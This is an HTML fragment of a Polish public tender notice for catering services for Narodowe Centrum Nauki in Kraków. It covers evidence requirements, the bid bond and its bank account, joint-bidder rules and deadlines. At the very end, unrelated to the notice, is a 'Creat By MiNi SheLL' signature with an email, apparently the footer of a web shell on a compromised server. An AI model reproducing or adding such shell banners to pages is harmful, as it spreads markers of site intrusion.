jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy;<br/>3) dokumenty i oświadczenia o których mowa w niniejszym ustępie powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w sytuacji, gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby. (UWAGA: dotyczy sytuacji, w której Wykonawca powołuje się na zasoby podmiotu udostępniającego zasoby w celu wykazania spełnienia warunków udziału w postępowaniu)<br/>2.oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego będzie wynikało, które usługi wykonają poszczególni Wykonawcy, w przypadku wykazania spełnienia warunków udziału w postępowaniu.<br/>(UWAGA: dotyczy sytuacji ,gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia)<br/>Składane na wezwanie Zamawiającego przez wykonawcę, którego oferta została najwyżej oceniona:<br/>3) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające<br/>ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. W wykazie należy wskazać wyłącznie te usługi, które potwierdzają spełnienie warunku udziału w postępowaniu.<br/>4) zaświadczenie o wpisie do rejestru zakładów podlegających kontroli właściwego Państwowego Inspektora Sanitarnego,<br/>5) decyzja właściwego państwowego inspektora sanitarnego zatwierdzająca zakład (firmę) do<br/>prowadzenia działalności na rynku spożywczym,<br/>6) decyzja właściwego państwowego inspektora sanitarnego kwalifikująca pojazd/pojazdy do<br/>transportu żywności,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga w niniejszym postępowaniu złożenia przedmiotowych środków<br/>dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta powinna zawierać:<br/>1) formularz oferty sporządzony według wzoru stanowiącego Załącznik nr 2 do SWZ;<br/>2)formularz cenowy sporządzony według wzoru stanowiącego Załącznik nr 3 do SWZ;<br/>3) portfolio, <br/>4) dokument elektroniczny potwierdzający wniesienie wadium w formie niepieniężnej w<br/>przypadku gdy Wykonawca składa wadium w tej formie (poręczenie, gwarancja), sporządzony<br/>zgodnie z wymaganiami określonymi w Rozdziale 17 SWZ. W przypadku wniesienia wadium w<br/>formie pieniężnej na rachunek bankowy Zamawiającego, Wykonawca może dołączyć do oferty<br/>potwierdzenie przelewu w postaci elektronicznej;<br/>5) oświadczenie o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków<br/>udziału; jeżeli dotyczy: także oświadczenia innych Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia oraz oświadczenie podmiotów udostępniających zasoby – jeżeli<br/>Wykonawca powołuje się na te zasoby<br/>6) (jeżeli dotyczy) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>7) (jeżeli dotyczy) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów;<br/>8) dokument potwierdzający umocowanie osoby podpisującej ofertę do działania w imieniu<br/>Wykonawcy – odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest<br/>zobowiązany do złożenia dokumentów, o których mowa w zdaniu pierwszym, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów formularzu oferty;<br/>9) (jeżeli dotyczy) pełnomocnictwo, w przypadku podpisania oferty przez pełnomocnika –dotyczy to również przypadków składania oferty przez Wykonawców występujących wspólnie, czyli np. uczestników konsorcjum, wspólników spółki cywilnej. Pełnomocnictwo musi zawierać w swojej treści zakres umocowania oraz jednoznacznie określać czynności do których pełnomocnik jest upoważniony <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości 3000 zł (słownie: trzech tysięcy<br/>złotych).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w:<br/>1) art. 98 ust. 1 pkt 2 ustawy Pzp - Zamawiający zwraca wadium niezwłocznie, nie później<br/>jednak niż w terminie 7 dni od dnia zawarcia umowy w sprawie zamówienia publicznego;<br/>2) art. 98 ust. 1 pkt 3 ustawy Pzp - Zamawiający zwraca wadium niezwłocznie, nie później<br/>jednak niż w terminie 7 dni od dnia unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie<br/>upłynął termin do jego wniesienia;<br/>3) art. 98 ust. 2 ustawy Pzp - Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni<br/>od dnia złożenia wniosku zwraca wadium Wykonawcy:<br/>a) który wycofał ofertę przed upływem terminu składania ofert,<br/>b) którego oferta została odrzucona,<br/>c) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana<br/>jako najkorzystniejsza,<br/>d) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>3. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. z<br/>2020 r. poz. 299).<br/>4. Wadium wnoszone w pieniądzu wpłaca się przelewem bankowym na następujący rachunek<br/>bankowy Zamawiającego:<br/>Bank Gospodarstwa Krajowego O/Kraków<br/>Nr rachunku: 77 1130 1150 0012 1243 1420 0008<br/>Tytuł przelewu: „Wadium – Świadczenie usług cateringowych podczas spotkań organizowanych w przez Narodowe Centrum Nauki w Krakowie, znak sprawy: DSO.271.1.2022”<br/>5. Wadium wnoszone w pieniądzu za pomocą przelewu bankowego uznaje się za skutecznie<br/>wniesione w momencie uznania rachunku Zamawiającego przed dniem i godziną wyznaczoną<br/>jako ostateczny termin składania ofert.<br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia wystawionej w postaci elektronicznej.<br/>Wykonawca nie opatruje dokument elektronicznego gwarancji lub poręczenia własnym<br/>podpisem kwalifikowanym, zaufanym lub osobistym.<br/>7. Dokument poręczenia lub gwarancji powinien zawierać informację o udzieleniu poręczenia lub gwarancji na rzecz Zamawiającego tytułem zapłaty wadium w postępowaniu o udzielenie<br/>zamówienia, którego przedmiotem jest „Świadczenie usług cateringowych podczas spotkań organizowanych w przez Narodowe Centrum Nauki w Krakowie&#34;, znak sprawy:<br/>DSO.271.1.2022”. Dokument poręczenia/gwarancji powinien być ważny przez cały okres<br/>związania ofertą oraz stanowić zobowiązanie poręczyciela lub gwaranta do nieodwołalnej,<br/>bezwarunkowej, płatnej na pierwsze żądanie Zamawiającego wypłaty wadium w przypadkach<br/>określonych w art. 98 ust. 6 ustawy Pzp.<br/>8. Zwrot albo zatrzymanie wadium nastąpi zgodnie z art. 98 ustawy Pzp.<br/>9. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo należy dołączyć do oferty.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia nie muszą posiadać określonej<br/>formy prawnej w celu złożenia oferty.<br/>4. Zamawiający nie określa dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagań związanych z realizacją zamówienia w inny sposób niż w odniesieniu do<br/>pojedynczych Wykonawców.<br/>5. Zapisy w SWZ oraz załącznikach dotyczące Wykonawcy stosuje się odpowiednio do<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>6. Zamawiający określa szczególny, obiektywnie uzasadniony, sposób spełniania przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunków udziału w<br/>postępowaniu:<br/>1) warunek określony w Rozdziale 6 ust. 1 pkt 4 lit. a będzie uznany za spełniony, jeżeli co<br/>najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaże<br/>posiadanie łącznego doświadczenia określonego w tym warunku (tj. Zamawiający nie dopuszcza<br/>możliwości sumowania doświadczenia Wykonawców) i wykona usługi, do realizacji których te<br/>zdolności są wymagane;<br/>7. Brak podstaw do wykluczenia musi wykazać każdy z Wykonawców oddzielnie.<br/>8. W przypadku wspólnego wykazywania spełnienia warunków udziału w postępowaniu<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi<br/>Załącznik nr 6 do SWZ.<br/>9. Jeżeli w niniejszym postępowaniu zostanie wybrana oferta Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, Zamawiający będzie żądał przed zawarciem umowy<br/>w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>10. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych<br/>Wykonawców kluczowych zadań dotyczących realizacji usługi.<br/>11. Po złożeniu oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem<br/>wyznaczonym do reprezentowania Wykonawców.<br/>12. Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia składa oddzielnie<br/>wraz z ofertą oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, którego wzór stanowi Załącznik nr 4 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Działając na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp Zamawiający przewiduje możliwość zmiany postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie dotyczącym:<br/>1)	zmiany stawki VAT lub podatku akcyzowego i związanej z nimi zmiany cen jednostkowych brutto, w przypadku wprowadzenia nowych uregulowań prawa powszechnie obowiązującego, które wymagałyby takich zmian. W takim przypadku obniżenie lub podwyższenie wynagrodzenia jest możliwe w wysokości odpowiadającej zmianie stawki odpowiedniego podatku, zgodnie z obowiązującymi w tym zakresie przepisami;<br/>2)	przedłużenia terminu realizacji umowy w przypadku gdy łączna wartość brutto zleconych Zestawów w okresie obowiązywania umowy będzie niższa niż 50 % łącznej maksymalnej kwoty wynagrodzenia brutto wskazanej w § 6 ust. 2 pkt 1 Umowy, jednak nie dłużej niż o kolejne 3 miesiące. Wykonawcy nie przysługuje roszczenie o przedłużenie okresu obowiązywania umowy;<br/>3)	zmiany podwykonawców, w szczególności zmiany albo rezygnacji z podwykonawcy, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy Pzp. Zmiana Umowy odbywa się na zasadach określonych w § 13;<br/>4)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy; <br/>5)	zmiany rachunku bankowego, o którym mowa w § 7 ust. 4.<br/>2.	W przypadku przedłużenia terminu realizacji umowy, o którym mowa w ust. 1 pkt 2 niniejszego paragrafu, Zamawiający przewiduje możliwość zmiany wynagrodzenia należnego Wykonawcy w zakresie dotyczącym niezrealizowanej części przedmiotu umowy, w przypadku, gdy w trakcie obowiązywania Umowy doszło do zmiany:<br/>1)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę;<br/>2)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne; <br/>3)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych <br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>3.	Ustala się następujące zasady wprowadzania zmian, o których mowa w ust. 1 pkt 1 i ust. 2:<br/>1)	w przypadkach określonych w ust. 1 pkt 1 i ust. 2 Wykonawca, w terminie nie dłuższym niż 14 dni od dnia wejścia w życie nowych przepisów lub podpisania aneksu w zakresie dotyczącym przedłużenia okresu trwania umowy, może zwrócić się do Zamawiającego z wnioskiem o zmianę wynagrodzenia. Wraz z wnioskiem, Wykonawca będzie zobowiązany pisemnie przedstawić Zamawiającemu szczegółową kalkulację uzasadniającą wzrost kosztów, wynikający ze zmiany w/w przepisów. Jeżeli po upływie 14 – dniowego terminu, Wykonawca nie zwróci się do Zamawiającego o zmianę wynagrodzenia, Zamawiający uzna, iż zmiany przepisów nie mają wpływu na koszty wykonania zamówienia przez Wykonawcę;<br/>2)	Zamawiający dokona analizy przedłożonej kalkulacji w terminie nie dłuższym niż 7 dni od dnia jej otrzymania. Jeżeli uzna, że przedstawiona kalkulacja potwierdza wzrost kosztów ponoszonych przez Wykonawcę, dokona zmiany umowy w tym zakresie. Zamawiający ma możliwość żądać od Wykonawcy w tym okresie przedłożenia dodatkowych wyjaśnień i dowodów, jeżeli uzna, że przedstawiona kalkulacja nie potwierdza wzrostu kosztów wykonania zamówienia, w wysokości zaproponowanej przez Wykonawcę;<br/>3)	zmiana wynagrodzenia nastąpi po wyrażeniu zgody przez Zamawiającego oraz po podpisaniu aneksu do umowy i może dotyczyć wyłącznie niezrealizowanej części umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-04 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy SIDAS dostępnej pod adresem: https://zamowienia.sidaspzp.pl, logując się na uprzednio założone konto</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-04 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-02</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający, zgodnie z art. 95 ust. 1 ustawy Pzp, wymaga, aby wszystkie osoby wykonujące czynności związane z realizacją zamówienia, polegające na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.– Kodeks pracy (t.j. Dz.U. z 2020 r.,<br/>poz. 1320 z późn. zm.) były zatrudnione przez Wykonawcę lub podwykonawcę na podstawie<br/>stosunku pracy w całym okresie realizacji zamówienia. Zamawiający nie wymaga zatrudnienia<br/>tych osób na pełny etat. Zamawiający dopuszcza, aby Wykonawca lub podwykonawca będący<br/>osobą fizyczną, która prowadzi jednoosobową działalność gospodarczą osobiście wykonywał<br/>czynności związane z realizacją zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com